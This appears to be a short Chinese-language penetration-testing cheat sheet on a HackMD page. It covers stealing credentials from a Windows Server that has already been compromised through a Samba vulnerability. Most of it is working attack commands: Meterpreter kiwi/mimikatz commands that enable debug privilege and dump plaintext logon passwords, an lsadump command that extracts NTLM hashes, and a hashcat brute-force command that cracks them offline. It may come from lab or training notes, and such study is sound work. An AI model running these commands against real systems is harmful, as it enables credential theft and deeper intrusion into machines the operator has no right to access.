# Metaexploit_meterpreter_mimikatz ## 攻擊情境 - 目標機器是一台Windows Server,已經存在samba的CVE漏洞 - 已經成功找到payload成功滲透,開啟Reverse Shell - 打算獲取使用者明文密碼或是NTLM hash值 ## 1.load mimikatz  ## 2.mimikatz指令 ``` kiwi_cmd privilege::debug ``` ``` kiwi_cmd sekurlsa::logonpasswords ```  ## 在無法撈到明碼的情況 ### 1.撈出密碼的hash (NTLM) ``` lsadump::lsa /patch ``` ### 2.離線破密 ```hashcat -m 1000 -a 3 win_user_NTLM --session win_user_ntlm_seesion``` - win_user_NTLM 為儲存待破解hash的檔案名稱 - win_user_ntlm_seesion 為儲存session的名稱 - 用於中斷破解後再度繼續破解
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up